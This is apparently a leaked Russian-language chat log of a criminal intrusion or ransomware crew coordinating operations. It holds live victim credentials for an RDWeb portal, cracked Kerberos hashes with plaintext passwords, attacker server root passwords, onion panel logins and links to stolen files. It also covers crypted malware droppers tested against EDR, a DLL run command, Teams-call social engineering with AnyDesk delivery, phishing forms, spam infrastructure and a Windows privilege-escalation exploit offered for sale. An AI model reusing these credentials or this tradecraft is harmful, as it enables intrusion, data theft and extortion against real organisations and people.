[2024-05-27 07:10:58] @n3auxaxl:matrix.collectionofmanager.space: Привет, сейчас гляну
--------------------
[2024-05-27 07:45:31] @lapa:matrix.bestflowers247.online: Доброе утро! В тг я там написал, что меня не будет до 15 00
--------------------
[2024-05-27 07:45:40] @lapa:matrix.bestflowers247.online: VALID_BRUT_CISCO.txt
--------------------
[2024-05-27 07:45:41] @lapa:matrix.bestflowers247.online: VALID_BRUT_RDWEB.txt
--------------------
[2024-05-27 07:45:42] @lapa:matrix.bestflowers247.online: VALID_BRUT_SONIC.txt
--------------------
[2024-05-27 07:45:47] @lapa:matrix.bestflowers247.online: сбросил, пока тут
--------------------
[2024-05-27 07:46:09] @lapa:matrix.bestflowers247.online: * Сбросил брут. Пока что тут
--------------------
[2024-05-27 08:29:16] @n3auxaxl:matrix.collectionofmanager.space: > <@burito:matrix.bestflowers247.online> sent a file.

чисто, стучит, оба файла проверил
--------------------
[2024-05-27 09:00:01] @usernamegg:matrix.bestflowers247.online: VALID_BRUT_CISCO.txt
--------------------
[2024-05-27 09:00:07] @usernamegg:matrix.bestflowers247.online: VALID_BRUT_RDWEB.txt
--------------------
[2024-05-27 09:00:26] @usernamegg:matrix.bestflowers247.online: VALID_BRUT_SONIC.txt
--------------------
[2024-05-27 09:01:17] @usernamegg:matrix.bestflowers247.online: доброе утро
--------------------
[2024-05-27 09:01:26] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-05-27 09:01:32] @usernamegg:matrix.bestflowers247.online: сейчас посмотрю
--------------------
[2024-05-27 09:01:46] @usernamegg:matrix.bestflowers247.online: привет
--------------------
[2024-05-27 09:01:54] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2024-05-27 09:01:55] @usernamegg:matrix.bestflowers247.online: на какой домен заходишь ?
--------------------
[2024-05-27 09:04:30] @n3auxaxl:matrix.collectionofmanager.space: првиет
--------------------
[2024-05-27 09:04:32] @n3auxaxl:matrix.collectionofmanager.space: привет
--------------------
[2024-05-27 09:04:34] @n3auxaxl:matrix.collectionofmanager.space: допиливаю форму
--------------------
[2024-05-27 09:04:49] @usernamegg:matrix.bestflowers247.online: отлично
--------------------
[2024-05-27 09:04:52] @usernamegg:matrix.bestflowers247.online: давай тетсить уже
--------------------
[2024-05-27 09:05:25] @usernamegg:matrix.bestflowers247.online: вчера сделали чисто. ?
--------------------
[2024-05-27 09:05:30] @usernamegg:matrix.bestflowers247.online: крипт ?
--------------------
[2024-05-27 09:05:36] @n3auxaxl:matrix.collectionofmanager.space: да
--------------------
[2024-05-27 09:05:45] @usernamegg:matrix.bestflowers247.online: есть рдп веб
--------------------
[2024-05-27 09:05:52] @n3auxaxl:matrix.collectionofmanager.space: проверил на тест тачке
--------------------
[2024-05-27 09:05:58] @n3auxaxl:matrix.collectionofmanager.space: можешь там попробовать длку запустить
--------------------
[2024-05-27 09:06:03] @usernamegg:matrix.bestflowers247.online: есть рдп веб в доменной сети
--------------------
[2024-05-27 09:06:25] @usernamejj:matrix.bestflowers247.online: `https://109.135.15.152/RDWeb/Pages/en-US/login.aspx   martina   Welcome2020!   sglighting\martina    52 PC, 9 SRV, no trusts`
--------------------
[2024-05-27 09:06:26] @usernamegg:matrix.bestflowers247.online: доступы котоыре мы не взяли 5м сетки
--------------------
[2024-05-27 09:06:32] @usernamegg:matrix.bestflowers247.online: очень много таких
--------------------
[2024-05-27 09:06:37] @usernamegg:matrix.bestflowers247.online: на них можно проверять
--------------------
[2024-05-27 09:06:40] @usernamegg:matrix.bestflowers247.online: скину скоро
--------------------
[2024-05-27 09:06:47] @usernamegg:matrix.bestflowers247.online: https://109.135.15.152/RDWeb/Pages/en-US/login.aspx   martina   Welcome2020!   sglighting\martina    52 PC, 9 SRV, no trusts

--------------------
[2024-05-27 09:06:47] @n3auxaxl:matrix.collectionofmanager.space: +++
--------------------
[2024-05-27 09:06:49] @usernamegg:matrix.bestflowers247.online: вот
--------------------
[2024-05-27 09:06:54] @usernamegg:matrix.bestflowers247.online: на нем можно проверять
--------------------
[2024-05-27 09:06:56] @usernamegg:matrix.bestflowers247.online: там прав админа нет
--------------------
[2024-05-27 09:07:05] @usernamegg:matrix.bestflowers247.online: скоро покидаю пока собрать надо
--------------------
[2024-05-27 09:07:20] @n3auxaxl:matrix.collectionofmanager.space: окей, я пока с формой разберусь до конца
--------------------
[2024-05-27 09:08:19] @usernamecc:matrix.bestflowers247.online: ---
--------------------
[2024-05-27 09:08:21] @usernamegg:matrix.bestflowers247.online: ```
Also, please show me these files from the list:

Home Folder\CShipman\BSN Sports\Important Info\Benefits\2019 Benfits Handbook.pdf

Presley Davis' Stuff\Onboarding\General Info\New Folder\VB-Holiday-Schedule-2023.pdf

Floral_Logo_Templates.ai

DocumentationReviews\Spirit Shop\0180130 Spirit Shop Denied Entry.pdf

sizing card - Copy.pdf

D23SDSSS01 - UDA All-American Hoodie.jpg

intall token windows.txt

Office 365 for iOS.pdf
```
--------------------
[2024-05-27 09:08:22] @usernamecc:matrix.bestflowers247.online: ```
bsnsports.com \\ id:a8b2287b-eee3-4b28-91f1-082e22eef989
pkaufmann.com \\ id:85af65f2-a2e2-4f97-bda1-dfdec01a9505
```
--------------------
[2024-05-27 09:09:02] @n3auxaxl:matrix.collectionofmanager.space: https://scanner.to/result_EDR/N2rHVp2N6GdW
--------------------
[2024-05-27 09:09:11] @n3auxaxl:matrix.collectionofmanager.space: вот длку на едрках проверил если что только что
--------------------
[2024-05-27 09:09:14] @n3auxaxl:matrix.collectionofmanager.space: надо чтобы еще бен сделал
--------------------
[2024-05-27 09:13:17] @usernamegg:matrix.bestflowers247.online: softoag.com
--------------------
[2024-05-27 09:16:04] @burito:matrix.bestflowers247.online: > <@n3auxaxl:matrix.collectionofmanager.space> чисто, стучит, оба файла проверил

Привет, гуд
--------------------
[2024-05-27 09:18:39] @usernamecc:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ```
> Also, please show me these files from the list:
>
> Home Folder\CShipman\BSN Sports\Important Info\Benefits\2019 Benfits Handbook.pdf
>
> Presley Davis' Stuff\Onboarding\General Info\New Folder\VB-Holiday-Schedule-2023.pdf
>
> Floral_Logo_Templates.ai
>
> DocumentationReviews\Spirit Shop\0180130 Spirit Shop Denied Entry.pdf
>
> sizing card - Copy.pdf
>
> D23SDSSS01 - UDA All-American Hoodie.jpg
>
> intall token windows.txt
>
> Office 365 for iOS.pdf
> ```

```
SSG_FILE$
http://temp.sh/FWnbu/td4s295BeYTWQSa3wnVHLEjcyMrqDPAvGhJuRKXm.zip
td4s295BeYTWQSa3wnVHLEjcyMrqDPAvGhJuRKXm.zip
extract pass : YdApZNfUL4eumQDFVXactTH5K6WPx3wvjzh9SM8b
```
--------------------
[2024-05-27 09:25:26] @usernamegg:matrix.bestflowers247.online: мне к 17:00 уже нужно прям рабочий фаил,  отестировать и уже будем залетать к ним на тачки
--------------------
[2024-05-27 09:25:46] @usernamegg:matrix.bestflowers247.online: я думаю что тебе самому нужно сделать первые 5 установок софта
--------------------
[2024-05-27 09:25:59] @usernamegg:matrix.bestflowers247.online: что бы ты заходил по энидеску
--------------------
[2024-05-27 09:26:07] @usernamegg:matrix.bestflowers247.online: и закпскал фаил у них на компе
--------------------
[2024-05-27 09:26:15] @usernamegg:matrix.bestflowers247.online: начнем звонить с 178
--------------------
[2024-05-27 09:26:23] @usernamegg:matrix.bestflowers247.online: * начнем звонить с 17:00
--------------------
[2024-05-27 09:26:29] @n3auxaxl:matrix.collectionofmanager.space: окей, хорошо
--------------------
[2024-05-27 09:26:49] @n3auxaxl:matrix.collectionofmanager.space: там все просто по идее будет
--------------------
[2024-05-27 09:26:52] @n3auxaxl:matrix.collectionofmanager.space: 1 файл запускаете и все
--------------------
[2024-05-27 09:26:57] @n3auxaxl:matrix.collectionofmanager.space: и дальше уже само по себе пойдет
--------------------
[2024-05-27 09:27:06] @usernamegg:matrix.bestflowers247.online: [16:34:49] vns10k -выгружает хосты шодан,: привет, сегодня скину
[16:39:47] vns10k -выгружает хосты шодан,: если сегодня не успею то уже завтра точно будет
[16:40:44] vns10k -выгружает хосты шодан,: мне только с зумай осталось догрузить и достать все с json'ов
--------------------
[2024-05-27 09:27:13] @usernamegg:matrix.bestflowers247.online: как скинет я сразу тебе отдам
--------------------
[2024-05-27 09:27:41] @n3auxaxl:matrix.collectionofmanager.space: дай мне проксю, x86 exe билд, чтобы я щас сделал тестовый прогруз
--------------------
[2024-05-27 09:49:40] @nickolas:talks.icu: Привет дорогой !)
--------------------
[2024-05-27 09:49:48] @nickolas:talks.icu: Спортсменам вы видимо че-то важное ебанули.
--------------------
[2024-05-27 09:49:54] @nickolas:talks.icu: Сегодня в сша федерал холлидей
--------------------
[2024-05-27 09:50:40] @usernamegg:matrix.bestflowers247.online: ```
1. Today's date
24/5/2024
2. Item name
windows LPE
3. Asking price and availability of exclusive acquisition

4. Affected OS
windows 10 1809-now
windows server 2019-now
5. Vulnerable target application versions and reliability. If 32 bit
only, is 64 bit vulnerable? List complete point release range
64 bit
6. Tested, functional against target application versions, list complete
point release range. Explain tested on versions
tested
7. Does this exploit affect the current target version?
[ ] Yes
[ ] No

8. Privilege Level Gained
[ ] As logged in user (Select Integrity level below for Windows)
[ ] Web Browser's default (IE - Low, Others - Med)
[ ] Low
[ ] Medium
[ ] High
[x] Root, Admin or System
[x] Ring 0/Kernel
[ ] Other

9. Exploit Type (select all that apply)
[ ] Remote code execution
[x] Privilege escalation
[ ] Font based
[ ] Sandbox escape
[ ] Information disclosure (peek)
[ ] Code signing bypass
[ ] Persistency
[ ] Other

10. Privilege Level Required
[ ] As logged in user (Select Integrity level below for Windows)
[ ] Web Browser's default (IE - Low, Others - Med)
[ ] Low
[x] Medium
[ ] High
[ ] Root, Admin or System
[ ] Ring 0/Kernel
[ ] Other
[ ] None

11. Delivery Method
[ ] Via web page
[ ] Via file
[ ] Via network protocol
[x] Local privilege escalation
[ ] Via email

12. Bug Class
[x] Memory corruption
[x] Design/logic flaw (auth-bypass / update issues)
[ ] Input validation flaw (XSS/XSRF/SQLi/command injection, etc.)
[ ] Misconfiguration
[ ] Information disclosure
[ ] Cryptographic bug
[ ] Denial of service

13. Number of bugs exploited in the item:
1
14. Exploitation Parameters
[ ] Bypasses ASLR
[ ] Bypasses DEP / W ^ X
[ ] Bypasses Application Sandbox
[ ] Bypasses SMEP/PXN
[ ] Bypasses EMET Version ___
[ ] Bypasses CFG (Win 8.1)
[ ] N/A

15. Is ROP employed?
[x ] No
[ ] Yes (but without fixed addresses)
- Number of chains included?
- Is the ROP set complete?
- What module does ROP occur from?

16. Does this item alert the target user? Explain
no
17. How long does exploitation take, in seconds?
1s
18. Does this item require any specific user interactions?
no
19. Any associated caveats or environmental factors? For example - does
the exploit determine remote OS/App versioning, and is that required?

20. Does it require additional work to be compatible with arbitrary
payloads?
[ ] Yes
[x] No

21. Is this a finished item you have in your possession that is ready
for delivery immediately?
[x] Yes
[ ] No
[ ] 1-5 days
[ ] 6-10 days
[ ] More (explain)

22. Impact on framework (crashes, etc.)

23. Success rate (or number of necessary attempts)
98%

[12:36:16] zdays: 24. Does this item support continuation of execution?
yes
25. Description. Detail a list of deliverables including documentation

26. Testing instructions

27. Comments and other notes; unusual artifacts, other limitations,
mitigations or other pieces of information
```

--------------------
[2024-05-27 09:50:43] @nickolas:talks.icu: Возможно кстати у них переговорщики от Rapid7, так как их защитные продукты были внутри
--------------------
[2024-05-27 09:50:58] @usernamegg:matrix.bestflowers247.online: есть обсулютно новый винЛПЕ очень высокого качества
--------------------
[2024-05-27 09:53:21] @muaddib6:matrix.org: Добрый день. Что сделать?
--------------------
[2024-05-27 09:53:45] @nickolas:talks.icu: * Возможно кстати у них переговорщики от Rapid7, так как их защитные продукты были внутри
самый прикол если у них за алертами внутри следили сами сотрудники Rapid7 , типа по программе MDR (managed detect & response)
--------------------
[2024-05-27 09:54:33] @n3auxaxl:matrix.collectionofmanager.space: Привет! Скину скоро новый билд
--------------------
[2024-05-27 09:55:00] @muaddib6:matrix.org: Хорошо, жду.
--------------------
[2024-05-27 10:05:32] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> Привет дорогой !)

Брат привет!
--------------------
[2024-05-27 10:06:18] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> Спортсменам вы видимо че-то важное ебанули.

хорошо пишут,суеты много наводят. Но тут же они самые хитровыебанные. Скинули ете файлы за счет которых можно востановить виртуализацию
--------------------
[2024-05-27 10:06:27] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> Сегодня в сша федерал холлидей

вы сегодня не звоните ?
--------------------
[2024-05-27 10:06:34] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> Возможно кстати у них переговорщики от Rapid7, так как их защитные продукты были внутри
> самый прикол если у них за алертами внутри следили сами сотрудники Rapid7 , типа по программе MDR (managed detect & response)

все может быть
--------------------
[2024-05-27 10:07:24] @usernamegg:matrix.bestflowers247.online: мы же делаем лендин куда надо будет пролить фаил
--------------------
[2024-05-27 10:07:36] @usernamegg:matrix.bestflowers247.online: и будем скачивать его по линку с красиво сайта
--------------------
[2024-05-27 10:07:50] @usernamegg:matrix.bestflowers247.online: скоро выйдам тебе туда доступ как натянем его
--------------------
[2024-05-27 10:08:21] @n3auxaxl:matrix.collectionofmanager.space: +++
--------------------
[2024-05-27 10:09:37] @usernamegg:matrix.bestflowers247.online: IMG_0943.MP4
--------------------
[2024-05-27 10:09:44] @usernamegg:matrix.bestflowers247.online: иногда ощущаю себя этим индусом )
--------------------
[2024-05-27 10:11:52] @usernamett:matrix.bestflowers247.online: ```
proxychains ssh root@38.180.160.76 = softoag.com
Password: tFRSDR5*&^1S6E4&#hCv_67kHKg
```

--------------------
[2024-05-27 10:18:51] @nickolas:talks.icu: ага, сегодня без звонков.
Ну смотрим, че там оно и как будет идти.
--------------------
[2024-05-27 10:36:48] @usernamegg:matrix.bestflowers247.online: в итоге звонили с тимса ?
--------------------
[2024-05-27 10:36:53] @usernamegg:matrix.bestflowers247.online: лучше пробив ?
--------------------
[2024-05-27 10:38:03] @nickolas:talks.icu: лучше дозваниваемость
--------------------
[2024-05-27 10:38:09] @nickolas:talks.icu: по телефону звонить - хуже
--------------------
[2024-05-27 10:38:48] @nickolas:talks.icu: но писать именно в тимсе и передавать данные с помощью чата прямо табу, народ сразу орет, что вы типа не из нашей организации
--------------------
[2024-05-27 10:39:31] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> но писать именно в тимсе и передавать данные с помощью чата прямо табу, народ сразу орет, что вы типа не из нашей организации

ну конечно
--------------------
[2024-05-27 10:39:38] @usernamegg:matrix.bestflowers247.online: а когда идет звонок они не видят этого ?
--------------------
[2024-05-27 10:39:41] @nickolas:talks.icu: только руками через ремоут акссесс доставлять удается
--------------------
[2024-05-27 10:39:53] @nickolas:talks.icu: видят, но там оно так, не взрачная приписка экстернал
--------------------
[2024-05-27 10:39:59] @nickolas:talks.icu: многие и не замечают этого
--------------------
[2024-05-27 10:40:13] @usernamegg:matrix.bestflowers247.online: а нельзя было сделать сразу форму где он креды вводит
--------------------
[2024-05-27 10:40:21] @usernamegg:matrix.bestflowers247.online: и они рпилетаю в поделку кортеса
--------------------
[2024-05-27 10:40:33] @nickolas:talks.icu: форму формата ?)
--------------------
[2024-05-27 10:40:51] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> видят, но там оно так, не взрачная приписка экстернал

а как ты пробиваешь что именно этот чел кобу вы зафлудили почту есть в тимс?
--------------------
[2024-05-27 10:41:00] @usernamegg:matrix.bestflowers247.online: > <@nickolas:talks.icu> форму формата ?)

форму ввода кред
--------------------
[2024-05-27 10:41:00] @nickolas:talks.icu: мы делали всплывающее окно, делали с валидацией это окно
--------------------
[2024-05-27 10:41:04] @nickolas:talks.icu: мы заранее все чекаем
--------------------
[2024-05-27 10:41:13] @nickolas:talks.icu: у нас много стадий предварительной подготовки
--------------------
[2024-05-27 10:41:16] @usernamegg:matrix.bestflowers247.online: ты же должен был видеть ее
--------------------
[2024-05-27 10:41:35] @nickolas:talks.icu: у нас есть такие формы, оно просто в софт зашито
--------------------
[2024-05-27 10:41:41] @usernamegg:matrix.bestflowers247.online: Screenshot_20.png
--------------------
[2024-05-27 10:42:46] @nickolas:talks.icu: не, там сразу их подгрузить не удается
--------------------
[2024-05-27 11:03:08] @usernamess:matrix.bestflowers247.online: TSAM_kerbs.txt
--------------------
[2024-05-27 11:06:21] @adm:talks.icu: 
http://bpeln2aqs66qqfuex2cvcyjiy5ggcwbyh5nbmxzxt6daamkmpmufv4qd.onion
http basic:
WweZGERukHBtrbgpuyrabuJ
8jH9£>2h+Rr@Ej}SzJ]>Ys|g},.4T[

personal creds:
OFiHryLLaciXGlaoEaj
+CiLxcA3/[rj92x33/,nq0%I£t.+r]6X(


--------------------
[2024-05-27 11:12:01] @n3auxaxl:matrix.collectionofmanager.space: STREAM: MN_AD_NAJJ1paV
PASS: 4159548d43b473cba7e03835c599d9ee
FileType: DLL
DLLEntryPoint: InitLightshot
--------------------
[2024-05-27 11:12:14] @n3auxaxl:matrix.collectionofmanager.space: dropper_MN_AD_NAJJ1paV_f0adda360d2b4ccda11468e026526576_k7p78vm.zip
--------------------
[2024-05-27 11:12:28] @muaddib6:matrix.org: Принял. Занимаюсь
--------------------
[2024-05-27 11:14:10] @usernamegg:matrix.bestflowers247.online: http://ts2jdchwrtzkvpfahrmcmtjru2qevsbyqy46d6kqnr424qfuf4l2gsad.onion

--------------------
[2024-05-27 11:14:16] @usernamegg:matrix.bestflowers247.online: пробуй
--------------------
[2024-05-27 11:14:20] @adm:talks.icu: принял
--------------------
[2024-05-27 11:16:10] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-27 11:16:22] @lapa:matrix.bestflowers247.online: Впски с доменами сделают ?
--------------------
[2024-05-27 11:16:27] @lapa:matrix.bestflowers247.online: Чтобы прослать
--------------------
[2024-05-27 11:16:45] @adm:talks.icu: не пускает
--------------------
[2024-05-27 11:16:55] @adm:talks.icu: пишет дисконектид и все
--------------------
[2024-05-27 11:16:56] @usernamegg:matrix.bestflowers247.online: сегодня день памяти в юсе
--------------------
[2024-05-27 11:16:59] @usernamegg:matrix.bestflowers247.online: если только европпу
--------------------
[2024-05-27 11:17:02] @usernamegg:matrix.bestflowers247.online: ты разобрался ?
--------------------
[2024-05-27 11:17:11] @usernamegg:matrix.bestflowers247.online: сделаем впски и домены
--------------------
[2024-05-27 11:17:24] @usernamegg:matrix.bestflowers247.online: сделаю 2 впски и 2 домана
--------------------
[2024-05-27 11:17:28] @usernamegg:matrix.bestflowers247.online: все eu
--------------------
[2024-05-27 11:17:33] @usernamegg:matrix.bestflowers247.online: ?
--------------------
[2024-05-27 11:17:36] @usernameyy:matrix.bestflowers247.online: requirements.txt
--------------------
[2024-05-27 11:17:36] @usernameyy:matrix.bestflowers247.online: result.csv
--------------------
[2024-05-27 11:17:36] @usernameyy:matrix.bestflowers247.online: Goc.py
--------------------
[2024-05-27 11:17:37] @usernameyy:matrix.bestflowers247.online: ```
proxychains ../venv/bin/python Goc.py -server 95.217.84.230 -ldaplogin 'administrator' -ldappass 'Vpskotggg888aaa' -domain 'test.com'
```

--------------------
[2024-05-27 11:18:10] @adm:talks.icu: http basic: проходит
--------------------
[2024-05-27 11:18:13] @usernamegg:matrix.bestflowers247.online: сделай 2 впски и 2 домана под спам просыл все EU и Ubuntu
--------------------
[2024-05-27 11:18:14] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> ты разобрался ?

да, все ок, приехал только
--------------------
[2024-05-27 11:18:18] @adm:talks.icu: personal creds: не пускает
--------------------
[2024-05-27 11:18:21] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> сделаю 2 впски и 2 домана

да, можно
--------------------
[2024-05-27 11:18:41] @usernamegg:matrix.bestflowers247.online: 
http://bpeln2aqs66qqfuex2cvcyjiy5ggcwbyh5nbmxzxt6daamkmpmufv4qd.onion
http basic:
WweZGERukHBtrbgpuyrabuJ
8jH9£>2h+Rr@Ej}SzJ]>Ys|g},.4T[

personal creds:
OFiHryLLaciXGlaoEaj
+CiLxcA3/[rj92x33/,nq0%I£t.+r]6X(


--------------------
[2024-05-27 11:18:49] @lapa:matrix.bestflowers247.online: но наверное завтра уже европу прошлем, так сегодня может уже не успеем, пока домены там заработают
--------------------
[2024-05-27 11:18:54] @usernamegg:matrix.bestflowers247.online: зайти не может, подкоректируй ему данные для входа
--------------------
[2024-05-27 11:18:55] @usernamehunter:matrix.bestflowers247.online: $krb5tgs$23$*CES$TSAM.LOCAL$TSAM.Local/CES*$ca17d1148e6337.....a97100f08991de6:NewStart@2018!

--------------------
[2024-05-27 11:19:03] @usernamess:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 11:19:08] @usernameyy:matrix.bestflowers247.online: ```
admcor:
OFiHryLLaciXGlaoEaj
GxE2Pq=t00z?XZy*3GCB!irHfCx:M.4c
--------------------
[2024-05-27 11:19:17] @usernamegg:matrix.bestflowers247.online: сейчас быстро сделаю
--------------------
[2024-05-27 11:19:30] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-27 11:22:11] @usernamehunter:matrix.bestflowers247.online: $krb5tgs$23$*AXSQLPROD$TSAM.LOCAL$TSAM.Local/AXSQLPROD*$29abd53cb90......6d192c5d9a6:Azxc890!@#

--------------------
[2024-05-27 11:22:30] @usernamess:matrix.bestflowers247.online: ++
--------------------
[2024-05-27 11:40:52] @lapa:matrix.bestflowers247.online: ну у нас если что есть один линк, его можно прослать
--------------------
[2024-05-27 11:51:02] @n3auxaxl:matrix.collectionofmanager.space: щас буду переписывать форму с шаропв
--------------------
[2024-05-27 11:51:06] @n3auxaxl:matrix.collectionofmanager.space: шапров
--------------------
[2024-05-27 11:51:11] @n3auxaxl:matrix.collectionofmanager.space: не на каждой тачке они есть втупую
--------------------
[2024-05-27 11:51:20] @n3auxaxl:matrix.collectionofmanager.space: а еще ставить туда vcredist
--------------------
[2024-05-27 11:51:27] @n3auxaxl:matrix.collectionofmanager.space: это ппиздец как долго бдует
--------------------
[2024-05-27 11:51:37] @n3auxaxl:matrix.collectionofmanager.space: надо чтобы чисто скачивался 1 зип, мы запускали updater и все
--------------------
[2024-05-27 11:51:43] @n3auxaxl:matrix.collectionofmanager.space: может щас даже на vba каком то сделаю
--------------------
[2024-05-27 11:51:47] @n3auxaxl:matrix.collectionofmanager.space: или что то типо такого
--------------------
[2024-05-27 11:51:50] @n3auxaxl:matrix.collectionofmanager.space: чтобы максимально просто было
--------------------
[2024-05-27 11:52:00] @n3auxaxl:matrix.collectionofmanager.space: я креды буду класть в папку programdata куда то
--------------------
[2024-05-27 11:52:06] @n3auxaxl:matrix.collectionofmanager.space: и потом пика будет их читать
--------------------
[2024-05-27 11:52:08] @n3auxaxl:matrix.collectionofmanager.space: так будет лучше
--------------------
[2024-05-27 11:52:25] @n3auxaxl:matrix.collectionofmanager.space: или через cmd.exe / set
--------------------
[2024-05-27 11:52:30] @n3auxaxl:matrix.collectionofmanager.space: кароче разберемся
--------------------
[2024-05-27 11:52:57] @muaddib6:matrix.org: > <@n3auxaxl:matrix.collectionofmanager.space> sent a file.

Готово
--------------------
[2024-05-27 11:53:04] @muaddib6:matrix.org: 1.7z
--------------------
[2024-05-27 11:53:10] @muaddib6:matrix.org: строка:
--------------------
[2024-05-27 11:53:11] @muaddib6:matrix.org: Hgsv4PZph2FuMWU7nDYrASLaxCmtEX6RJqN5GkTwyfce8KBbzQ
--------------------
[2024-05-27 11:53:21] @n3auxaxl:matrix.collectionofmanager.space: +++
--------------------
[2024-05-27 11:53:26] @n3auxaxl:matrix.collectionofmanager.space: щас гляну, пару сек
--------------------
[2024-05-27 11:54:54] @usernamess:matrix.bestflowers247.online: 38_443_x64
--------------------
[2024-05-27 11:54:56] @usernamess:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> sent a file.

GetModuleProp
--------------------
[2024-05-27 11:55:17] @muaddib6:matrix.org: ++
--------------------
[2024-05-27 11:55:29] @usernamess:matrix.bestflowers247.online: 38_SMB_x64_GetModuleProp
--------------------
[2024-05-27 11:56:05] @muaddib6:matrix.org: это разные файлы?
--------------------
[2024-05-27 11:56:15] @usernamess:matrix.bestflowers247.online: да.
--------------------
[2024-05-27 11:56:36] @muaddib6:matrix.org: +
--------------------
[2024-05-27 12:05:15] @usernameyy:matrix.bestflowers247.online: Goc.py
--------------------
[2024-05-27 12:05:15] @usernameyy:matrix.bestflowers247.online: sorted.txt
--------------------
[2024-05-27 12:05:30] @usernameyy:matrix.bestflowers247.online: +sorted (в примере у меня нет операционной системе в базе лдапа, поэтому аноун)
--------------------
[2024-05-27 12:05:36] @usernameyy:matrix.bestflowers247.online: * +sorted (в примере у меня нет операционной системы в базе лдапа, поэтому аноун)
--------------------
[2024-05-27 12:07:09] @usernamett:matrix.bestflowers247.online: ```
proxychains ssh root@89.117.2.89 = gentillytransfer.com
Password: th12_3*(4*&^QWenyh
```
--------------------
[2024-05-27 12:08:30] @usernameyy:matrix.bestflowers247.online: ```
usage: Goc.py [-h] [-server SERVER] [-ldaplogin LDAPLOGIN] [-ldappass LDAPPASS] [-domain DOMAIN] [-ldapport LDAPPORT] [-threads THREADS] [-file FILE]
[-sortedfile SORTEDFILE]

goc.

options:
-h, --help            show this help message and exit
-server SERVER
-ldaplogin LDAPLOGIN
-ldappass LDAPPASS
-domain DOMAIN
-ldapport LDAPPORT
-threads THREADS
-file FILE
-sortedfile SORTEDFILE
--------------------
[2024-05-27 12:08:38] @usernameyy:matrix.bestflowers247.online: аргументы говорят сами за себя
--------------------
[2024-05-27 12:14:45] @burito:matrix.bestflowers247.online: > <@n3auxaxl:matrix.collectionofmanager.space> STREAM: MN_AD_NAJJ1paV
> PASS: 4159548d43b473cba7e03835c599d9ee
> FileType: DLL
> DLLEntryPoint: InitLightshot

строка CgYGMkpTzDfQHjXJmsLatgkmCbeBxA
--------------------
[2024-05-27 12:14:46] @burito:matrix.bestflowers247.online: drprs.zip
--------------------
[2024-05-27 12:16:26] @n3auxaxl:matrix.collectionofmanager.space: > <@muaddib6:matrix.org> sent a file.

чисто
--------------------
[2024-05-27 12:19:31] @burito:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> 38_443_x64

regsvr32.exe dll.dll
строка IWrerumUSXPXmBXxWoklHlVzfucQLc
--------------------
[2024-05-27 12:19:31] @burito:matrix.bestflowers247.online: 38_443_x64.zip
--------------------
[2024-05-27 12:19:54] @burito:matrix.bestflowers247.online: а, GetModuleProp надо, щас
--------------------
[2024-05-27 12:21:43] @muaddib6:matrix.org: Хорошо
--------------------
[2024-05-27 12:24:27] @n3auxaxl:matrix.collectionofmanager.space: > <@burito:matrix.bestflowers247.online> sent a file.

скоро гляну, отпишу
--------------------
[2024-05-27 12:24:52] @burito:matrix.bestflowers247.online: jr
--------------------
[2024-05-27 12:24:56] @burito:matrix.bestflowers247.online: * ok
--------------------
[2024-05-27 12:25:34] @usernamegg:matrix.bestflowers247.online: ```
proxychains ssh root@89.117.2.89 = gentillytransfer.com
Password: th12_3*(4*&^QWenyh
```
--------------------
[2024-05-27 12:25:52] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-27 12:26:06] @lapa:matrix.bestflowers247.online: и к домену нужен доступ, чтобы днс настроить
--------------------
[2024-05-27 12:27:57] @usernamegg:matrix.bestflowers247.online: щас щас
--------------------
[2024-05-27 12:28:04] @usernamegg:matrix.bestflowers247.online: делает еще остальные
--------------------
[2024-05-27 12:28:05] @usernamett:matrix.bestflowers247.online: ```
==shockhosting.net==
oraliestatutory@fthcapital.com
ds12wWu'@Q}Q$<dvjvDF

gentillytransfer.com = 89.117.2.89
```
--------------------
[2024-05-27 12:28:10] @usernamegg:matrix.bestflowers247.online: ```
==shockhosting.net==
oraliestatutory@fthcapital.com
ds12wWu'@Q}Q$<dvjvDF

gentillytransfer.com = 89.117.2.89
```
--------------------
[2024-05-27 12:28:16] @usernamegg:matrix.bestflowers247.online: доступ к домену
--------------------
[2024-05-27 12:28:38] @lapa:matrix.bestflowers247.online: +
--------------------
[2024-05-27 12:28:39] @usernamegg:matrix.bestflowers247.online: [15:18:26] vns10k -выгружает хосты шодан,: Привет
[15:18:26] vns10k -выгружает хосты шодан,: https://oshi.at/kUzc
--------------------
[2024-05-27 12:28:59] @lapa:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> [15:18:26] vns10k -выгружает хосты шодан,: Привет
> [15:18:26] vns10k -выгружает хосты шодан,: https://oshi.at/kUzc

json кстати нам может не сбрасывать
--------------------
[2024-05-27 12:31:32] @usernamegg:matrix.bestflowers247.online: не сбрасывать ?
--------------------
[2024-05-27 12:32:43] @lapa:matrix.bestflowers247.online: ну только нам txt файлы нужны
--------------------
[2024-05-27 12:32:46] @lapa:matrix.bestflowers247.online: где просто айпишники
--------------------
[2024-05-27 12:32:56] @lapa:matrix.bestflowers247.online: а то он там сбрасывает json который много весит
--------------------
[2024-05-27 12:33:25] @lapa:matrix.bestflowers247.online: ну сейчас я пока не смотрел, что он там сбросил, он тогда просто json сбрасывал, а он мне не нужен, только txt нужен
--------------------
[2024-05-27 12:34:01] @usernamegg:matrix.bestflowers247.online: build.008.tar.zip
--------------------
[2024-05-27 12:34:08] @usernamegg:matrix.bestflowers247.online: Gf!KOaW}7CkPatg
--------------------
[2024-05-27 12:34:28] @usernamegg:matrix.bestflowers247.online: image.png
--------------------
